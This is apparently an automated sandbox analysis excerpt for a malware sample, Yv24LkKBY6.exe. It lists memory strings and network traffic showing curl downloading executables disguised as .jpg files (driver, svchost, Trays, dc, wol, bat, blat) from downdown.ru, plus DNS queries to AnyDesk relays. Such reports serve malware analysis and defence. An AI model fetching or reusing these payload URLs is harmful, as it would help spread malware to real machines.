STRING/FILE Read cookies from STRING/FILE (H) --data-urlencode DATA HTTP POST data url encoded (H) -c, --cookie-jar FILE Write cookies to FILE after operation (H) --delegation STRING GSS-API delegation permission --disable-eprt Inhibit using EPRT or LPRT (F) --create-dirs Create necessary local directory hierarchy --crlfile FILE Get a CRL list in PEM format from the given file --digest Use HTTP Digest Authentication (H) --disable-epsv Inhibit using EPSV (F) --dns-servers DNS server addrs to use: 1.1.1.1;2.2.2.2 --dns-interface Interface to use for DNS requests -D, --dump-header FILE Write the headers to FILE --dns-ipv4-addr IPv4 address to use for DNS requests, dot notation --egd-file FILE EGD socket path for random data (SSL) --dns-ipv6-addr IPv6 address to use for DNS requests, dot notation -F, --form CONTENT Specify HTTP multipart POST data (H) --engine ENGINE Crypto engine (use "--engine list" for list) (SSL) --ftp-account DATA Account data string (F) -f, --fail Fail silently (no output at all) on HTTP errors (H) --ftp-pasv Use PASV/EPSV instead of PORT (F) --ftp-ssl-ccc-mode ACTIVE/PASSIVE Set CCC mode (F) --form-string STRING Specify HTTP multipart POST data (H) --ftp-alternative-to-user COMMAND String to replace "USER [name]" (F) -G, --get Send the -d data with a HTTP GET (H) --ftp-create-dirs Create the remote dirs if not present (F) --ftp-ssl-ccc Send CCC after authenticating (F) -H, --header LINE Pass custom header LINE to server (H) --ftp-method [MULTICWD/NOCWD/SINGLECWD] Control CWD usage (F) -h, --help This help text -P, --ftp-port ADR Use PORT with given address instead of PASV (F) --ftp-skip-pasv-ip Skip the IP address for PASV (F)
    Source: curl.exe, 00000027.00000002.20416769958.000000000030B000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: Usage: curl [options...] <url>
    Source: curl.exe, 00000027.00000002.20416769958.000000000030B000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: Usage: curl [options...] <url>Options: (H) means HTTP/HTTPS only, (F) means FTP only --anyauth Pick "any" authentication method (H) --basic Use HTTP Basic Authentication (H) -K, --config FILE Read config from FILE -a, --append Append to target file when uploading (F/SFTP) -C, --continue-at OFFSET Resumed transfer OFFSET --cacert FILE CA certificate to verify peer against (SSL) --capath DIR CA directory to verify peer against (SSL) --crlf Convert LF to CRLF in upload -E, --cert CERT[:PASSWD] Client certificate file and password (SSL) --cert-type TYPE Certificate file type (DER/PEM/ENG) (SSL) --ciphers LIST SSL ciphers to use (SSL) -d, --data DATA HTTP POST data (H) --data-ascii DATA HTTP POST ASCII data (H) --compressed Request compressed response (using deflate or gzip) --data-binary DATA HTTP POST binary data (H) --connect-timeout SECONDS Maximum time allowed for connection -b, --cookie STRING/FILE Read cookies from STRING/FILE (H) --data-urlencode DATA HTTP POST data url encoded (H) -c, --cookie-jar FILE Write cookies to FILE after operation (H) --delegation STRING GSS-API delegation permission --disable-eprt Inhibit using EPRT or LPRT (F) --create-dirs Create necessary local directory hierarchy --crlfile FILE Get a CRL list in PEM format from the given file --digest Use HTTP Digest Authentication (H) --disable-epsv Inhibit using EPSV (F) --dns-servers DNS server addrs to use: 1.1.1.1;2.2.2.2 --dns-interface Interface to use for DNS requests -D, --dump-header FILE Write the headers to FILE --dns-ipv4-addr IPv4 address to use for DNS requests, dot notation --egd-file FILE EGD socket path for random data (SSL) --dns-ipv6-addr IPv6 address to use for DNS requests, dot notation -F, --form CONTENT Specify HTTP multipart POST data (H) --engine ENGINE Crypto engine (use "--engine list" for list) (SSL) --ftp-account DATA Account data string (F) -f, --fail Fail silently (no output at all) on HTTP errors (H) --ftp-pasv Use PASV/EPSV instead of PORT (F) --ftp-ssl-ccc-mode ACTIVE/PASSIVE Set CCC mode (F) --form-string STRING Specify HTTP multipart POST data (H) --ftp-alternative-to-user COMMAND String to replace "USER [name]" (F) -G, --get Send the -d data with a HTTP GET (H) --ftp-create-dirs Create the remote dirs if not present (F) --ftp-ssl-ccc Send CCC after authenticating (F) -H, --header LINE Pass custom header LINE to server (H) --ftp-method [MULTICWD/NOCWD/SINGLECWD] Control CWD usage (F) -h, --help This help text -P, --ftp-port ADR Use PORT with given address instead of PASV (F) --ftp-skip-pasv-ip Skip the IP address for PASV (F)
    Source: global trafficDNS traffic detected: DNS query: downdown.ru
    Source: global trafficDNS traffic detected: DNS query: www.4t-niagara.com
    Source: global trafficDNS traffic detected: DNS query: boot.net.anydesk.com
    Source: global trafficDNS traffic detected: DNS query: relay-30ea2fb5.net.anydesk.com
    Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
    Source: global trafficTCP traffic: 192.168.11.20:56553 -> 239.255.255.250:1900
    Source: global trafficTCP traffic: 192.168.11.20:56553 -> 239.255.255.250:1900
    Source: global trafficTCP traffic: 192.168.11.20:56553 -> 239.255.255.250:1900
    Source: global trafficTCP traffic: 192.168.11.20:56553 -> 239.255.255.250:1900
    Source: driver.exe, 00000028.00000003.20430251957.0000000002E83000.00000004.00001000.00020000.00000000.sdmp, Trays.exe, 00000029.00000000.20436017665.00000000005A5000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://4t-niagara.com/hitmail.html
    Source: driver.exe, 00000028.00000003.20430251957.0000000002E83000.00000004.00001000.00020000.00000000.sdmp, Trays.exe, 00000029.00000000.20436017665.00000000005A5000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://4t-niagara.com/reminder.html
    Source: driver.exe, 00000028.00000003.20430251957.0000000002E83000.00000004.00001000.00020000.00000000.sdmp, Trays.exe, 00000029.00000000.20436017665.00000000005A5000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://4t-niagara.com/webimage.html
    Source: curl.exe, 00000027.00000003.20415977425.0000000000966000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000027.00000002.20417989459.0000000000966000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000027.00000003.20415827647.0000000000966000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
    Source: curl.exe, 00000027.00000003.20415977425.0000000000966000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000027.00000002.20417989459.0000000000966000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000027.00000003.20415827647.0000000000966000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root.crl0
    Source: Yv24LkKBY6.exe, 00000000.00000003.20214750806.0000000002840000.00000004.00001000.00020000.00000000.sdmp, curl.exe, curl.exe, 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000022.00000000.20288780667.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000023.00000002.20326480579.0000000000311000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000023.00000000.20311354865.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000024.00000002.20360721069.0000000000311000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000024.00000000.20328637461.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000025.00000002.20385977587.0000000000311000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000025.00000000.20362922109.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000026.00000002.20394402294.0000000000311000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000026.00000000.20388092061.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000027.00000000.20396877976.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000027.00000002.20416843085.0000000000311000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://curl.haxx.se/docs/http-cookies.html
    Source: curl.exeString found in binary or memory: http://curl.haxx.se/docs/http-cookies.html#
    Source: Yv24LkKBY6.exe, 00000000.00000003.20214750806.0000000002840000.00000004.00001000.00020000.00000000.sdmp, curl.exe, curl.exe, 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000022.00000000.20288780667.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000023.00000002.20326390773.000000000030B000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000023.00000000.20311354865.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000024.00000002.20360586166.000000000030B000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000024.00000000.20328637461.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000025.00000002.20385900647.000000000030B000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000025.00000000.20362922109.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000026.00000002.20394300207.000000000030B000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000026.00000000.20388092061.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000027.00000000.20396877976.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000027.00000002.20416769958.000000000030B000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://curl.haxx.se/docs/sslcerts.html
    Source: curl.exeString found in binary or memory: http://curl.haxx.se/docs/sslcerts.htmlcurl
    Source: curl.exe, 00000027.00000002.20416769958.000000000030B000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://curl.haxx.se/libcurl/c/curl_easy_setopt.html
    Source: Yv24LkKBY6.exe, 00000000.00000003.20236817758.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/Trays.j
    Source: curl.exe, 00000025.00000002.20386980186.0000000000930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/Trays.jpg
    Source: curl.exe, 00000025.00000002.20386980186.0000000000938000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/Trays.jpg)
    Source: curl.exe, 00000025.00000002.20386980186.0000000000930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/Trays.jpg4
    Source: curl.exe, 00000025.00000002.20386980186.0000000000930000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000025.00000002.20386688000.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/Trays.jpgC:
    Source: curl.exe, 00000025.00000002.20386980186.0000000000930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/Trays.jpgU
    Source: curl.exe, 00000025.00000002.20386980186.0000000000930000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000025.00000002.20386688000.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/Trays.jpgWinsta0
    Source: curl.exe, 00000025.00000002.20386980186.0000000000938000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/Trays.jpgng
    Source: Yv24LkKBY6.exe, 00000000.00000003.20236817758.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/bat.
    Source: Yv24LkKBY6.exe, 00000000.00000003.20236777918.0000000002200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/bat.j
    Source: Yv24LkKBY6.exe, Yv24LkKBY6.exe, 00000000.00000003.20236390049.0000000002204000.00000004.00001000.00020000.00000000.sdmp, Yv24LkKBY6.exe, 00000000.00000003.20236487709.000000000220C000.00000004.00001000.00020000.00000000.sdmp, Yv24LkKBY6.exe, 00000000.00000003.20237112937.00000000005BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/bat.jpg
    Source: Yv24LkKBY6.exe, 00000000.00000003.20236390049.0000000002204000.00000004.00001000.00020000.00000000.sdmp, Yv24LkKBY6.exe, 00000000.00000003.20236487709.000000000220C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/bat.jpgJ
    Source: curl.exe, 00000023.00000002.20327423704.0000000000DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/blat.jpg
    Source: Yv24LkKBY6.exe, 00000000.00000003.20236390049.0000000002204000.00000004.00001000.00020000.00000000.sdmp, Yv24LkKBY6.exe, 00000000.00000003.20236487709.000000000220C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/blat.jpg:
    Source: curl.exe, 00000023.00000002.20327423704.0000000000DB0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000023.00000002.20327171797.0000000000CB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/blat.jpgC:
    Source: curl.exe, 00000023.00000002.20327423704.0000000000DB0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000023.00000002.20327171797.0000000000CB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/blat.jpgWinsta0
    Source: curl.exe, 00000023.00000002.20327423704.0000000000DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/blat.jpging
    Source: curl.exe, 00000023.00000002.20327423704.0000000000DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/blat.jpgs
    Source: Yv24LkKBY6.exe, 00000000.00000003.20236817758.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/dc.jp
    Source: curl.exe, 00000027.00000002.20417680823.0000000000920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/dc.jpg
    Source: Yv24LkKBY6.exe, 00000000.00000003.20237112937.0000000000589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/dc.jpg%
    Source: curl.exe, 00000027.00000002.20417680823.0000000000927000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/dc.jpg/
    Source: curl.exe, 00000027.00000002.20417680823.0000000000927000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/dc.jpg4
    Source: curl.exe, 00000027.00000002.20417451995.0000000000770000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000027.00000002.20417680823.0000000000920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/dc.jpgC:
    Source: Yv24LkKBY6.exe, 00000000.00000003.20237112937.0000000000589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/dc.jpgD
    Source: curl.exe, 00000027.00000002.20417451995.0000000000770000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000027.00000002.20417680823.0000000000920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/dc.jpgWinsta0
    Source: curl.exe, 00000027.00000002.20417680823.0000000000920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/dc.jpgt5
    Source: curl.exe, 00000022.00000002.20310303622.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000022.00000002.20310303622.0000000000D40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/driver.jpg
    Source: Yv24LkKBY6.exe, 00000000.00000003.20236817758.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/driver.jpg4
    Source: Yv24LkKBY6.exe, 00000000.00000003.20236390049.0000000002204000.00000004.00001000.00020000.00000000.sdmp, Yv24LkKBY6.exe, 00000000.00000003.20236487709.000000000220C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/driver.jpg9
    Source: curl.exe, 00000022.00000002.20310303622.0000000000D4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/driver.jpgC
    Source: curl.exe, 00000022.00000002.20310151194.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000022.00000002.20310303622.0000000000D40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/driver.jpgC:
    Source: curl.exe, 00000022.00000002.20310303622.0000000000D4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/driver.jpgJ
    Source: curl.exe, 00000022.00000002.20310151194.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000022.00000002.20310303622.0000000000D40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/driver.jpgWinsta0
    Source: curl.exe, 00000022.00000002.20310303622.0000000000D4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/driver.jpgf
    Source: Yv24LkKBY6.exe, 00000000.00000003.20236817758.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/svchost.
    Source: curl.exe, 00000024.00000002.20361728129.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000024.00000002.20361728129.0000000000EE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/svchost.jpg
    Source: curl.exe, 00000024.00000002.20361728129.0000000000EE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/svchost.jpg6S
    Source: curl.exe, 00000024.00000002.20361596421.0000000000E40000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000024.00000002.20361728129.0000000000EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/svchost.jpgC:
    Source: curl.exe, 00000024.00000002.20361596421.0000000000E40000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000024.00000002.20361728129.0000000000EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/svchost.jpgWinsta0
    Source: Yv24LkKBY6.exe, 00000000.00000003.20236390049.0000000002204000.00000004.00001000.00020000.00000000.sdmp, Yv24LkKBY6.exe, 00000000.00000003.20236487709.000000000220C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/svchost.jpgv
    Source: Yv24LkKBY6.exe, 00000000.00000003.20236817758.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/wol.j
    Source: curl.exe, 00000026.00000002.20395527745.0000000001560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/wol.jpg
    Source: curl.exe, 00000026.00000002.20395527745.0000000001568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/wol.jpg.
    Source: curl.exe, 00000026.00000002.20395527745.0000000001568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/wol.jpg8V
    Source: curl.exe, 00000026.00000002.20395527745.0000000001560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/wol.jpg;
    Source: curl.exe, 00000026.00000002.20395373813.0000000001440000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000026.00000002.20395527745.0000000001560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/wol.jpgC:
    Source: curl.exe, 00000026.00000002.20395373813.0000000001440000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000026.00000002.20395527745.0000000001560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/wol.jpgWinsta0
    Source: curl.exe, 00000026.00000002.20395527745.0000000001568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/wol.jpgs8
    Source: curl.exe, 00000026.00000002.20395527745.0000000001560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://downdown.ru/wol.jpgy
    Source: Yv24LkKBY6.exe, 00000000.00000003.20214750806.0000000002840000.00000004.00001000.00020000.00000000.sdmp, curl.exe, 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmp, curl.exe, 00000022.00000000.20288780667.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000023.00000000.20311354865.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000023.00000002.20326442685.0000000000310000.00000004.00000001.01000000.00000006.sdmp, curl.exe, 00000024.00000002.20360654883.0000000000310000.00000004.00000001.01000000.00000006.sdmp, curl.exe, 00000024.00000000.20328637461.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000025.00000002.20385949843.0000000000310000.00000004.00000001.01000000.00000006.sdmp, curl.exe, 00000025.00000000.20362922109.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000026.00000002.20394349903.0000000000310000.00000004.00000001.01000000.00000006.sdmp, curl.exe, 00000026.00000000.20388092061.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000027.00000000.20396877976.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000027.00000002.20416804342.0000000000310000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: http://https://-.://%s%s%s/%s://plusYou
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000003.20451690361.0000000002B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iptc.org/std/Iptc4xmpExt/2008-02-29/
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000003.20451690361.0000000002B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.useplus.org/ldf/xmp/1.0/
    Source: curl.exe, 00000027.00000003.20415977425.0000000000966000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000027.00000002.20417989459.0000000000966000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000027.00000003.20415827647.0000000000966000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
    Source: Yv24LkKBY6.exe, 00000000.00000003.20237112937.0000000000589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wndown.r
    Source: driver.exe, 00000028.00000002.20433555662.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000028.00000003.20430251957.0000000002E83000.00000004.00001000.00020000.00000000.sdmp, Trays.exe, 00000029.00000002.21464015268.000000000262A000.00000004.00001000.00020000.00000000.sdmp, Trays.exe, 00000029.00000000.20435397641.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Trays.exe, 00000029.00000000.20436017665.00000000005A5000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.4t-niagara.com
    Source: Trays.exe, 00000029.00000002.21461662298.00000000008AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/
    Source: Trays.exe, 00000029.00000002.21461662298.0000000000818000.00000004.00000020.00020000.00000000.sdmp, Trays.exe, 00000029.00000002.21461662298.000000000089B000.00000004.00000020.00020000.00000000.sdmp, Trays.exe, 00000029.00000002.21461662298.000000000088F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/checkupdate.php
    Source: Trays.exe, 00000029.00000002.21464015268.000000000261C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/checkupdate.php03b
    Source: Trays.exe, 00000029.00000002.21461662298.000000000088F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/checkupdate.php7f-514d22c62ca3llR
    Source: Trays.exe, 00000029.00000002.21461662298.00000000008AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/checkupdate.php8na
    Source: Trays.exe, 00000029.00000002.21461662298.00000000008C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/checkupdate.phpB
    Source: Trays.exe, 00000029.00000002.21461662298.0000000000818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/checkupdate.phpLk7g
    Source: Trays.exe, 00000029.00000002.21461662298.00000000008AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/checkupdate.phpb8
    Source: Trays.exe, 00000029.00000002.21461662298.000000000088F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/checkupdate.phpk-fulluser-l1-1-0s
    Source: Trays.exe, 00000029.00000002.21461662298.00000000008AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/checkupdate.phpnia
    Source: Trays.exe, 00000029.00000002.21461662298.0000000000864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/checkupdate.phpo7
    Source: Trays.exe, 00000029.00000002.21461662298.0000000000818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/checkupdate.phppkKg
    Source: Trays.exe, 00000029.00000002.21461662298.000000000088F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/checkupdate.phz(
    Source: Trays.exe, 00000029.00000000.20435397641.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Trays.exe, 00000029.00000002.21464015268.000000000261C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/files/4t-min.exe
    Source: Trays.exe, 00000029.00000002.21464015268.000000000261C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/files/4t-min.exe03b
    Source: driver.exe, 00000028.00000003.20430251957.0000000002E83000.00000004.00001000.00020000.00000000.sdmp, Trays.exe, 00000029.00000002.21464015268.000000000261C000.00000004.00001000.00020000.00000000.sdmp, Trays.exe, 00000029.00000000.20436017665.00000000005A5000.00000002.00000001.01000000.00000008.sdmp, Trays.exe, 00000029.00000002.21464015268.0000000002572000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/newsletter.html
    Source: Trays.exe, 00000029.00000002.21464015268.000000000261C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/newsletter.html03b
    Source: Trays.exe, 00000029.00000002.21461662298.0000000000855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/newsletter.html8
    Source: Trays.exe, 00000029.00000002.21461662298.000000000085E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/newsletter.html??????...D&
    Source: Trays.exe, 00000029.00000002.21461662298.000000000085E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/newsletter.html??????...e&
    Source: Trays.exe, 00000029.00000002.21461662298.0000000000855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/newsletter.htmln...8
    Source: Trays.exe, 00000029.00000000.20435397641.0000000000401000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.4t-niagara.com/support
    Source: Trays.exe, 00000029.00000002.21464015268.0000000002572000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/support/product.php?p=min&ver=6.07&win=wvWin10&c=b3JkZXJfaWQ9M0ZVTUZSSi1BR
    Source: Trays.exe, 00000029.00000002.21464015268.0000000002638000.00000004.00001000.00020000.00000000.sdmp, Trays.exe, 00000029.00000000.20436017665.00000000005A5000.00000002.00000001.01000000.00000008.sdmp, Trays.exe, 00000029.00000002.21461662298.000000000085E000.00000004.00000020.00020000.00000000.sdmp, Trays.exe, 00000029.00000002.21464015268.0000000002572000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/tray.html
    Source: Trays.exe, 00000029.00000002.21461662298.0000000000818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/tray.html5
    Source: Trays.exe, 00000029.00000002.21461662298.0000000000818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/tray.htmlgestion...ACrei&
    Source: Trays.exe, 00000029.00000002.21461662298.0000000000855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/tray.htmltmll
    Source: Trays.exe, 00000029.00000002.21461662298.0000000000855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/tray.htmltmll=
    Source: driver.exe, 00000028.00000003.20430251957.0000000002E83000.00000004.00001000.00020000.00000000.sdmp, Trays.exe, 00000029.00000002.21464015268.000000000261C000.00000004.00001000.00020000.00000000.sdmp, Trays.exe, 00000029.00000000.20436017665.00000000005A5000.00000002.00000001.01000000.00000008.sdmp, Trays.exe, 00000029.00000002.21464015268.0000000002572000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/tray_faq.html
    Source: Trays.exe, 00000029.00000002.21464015268.000000000261C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/tray_faq.html03b
    Source: Trays.exe, 00000029.00000002.21461662298.0000000000810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/tray_faq.htmll2-37
    Source: Trays.exe, 00000029.00000002.21461662298.000000000085E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/tray_faq.htmll??????...e&
    Source: Trays.exe, 00000029.00000002.21461662298.000000000085E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/tray_faq.htmllk
    Source: Trays.exe, 00000029.00000002.21461662298.000000000085E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/tray_faq.htmlln...e&
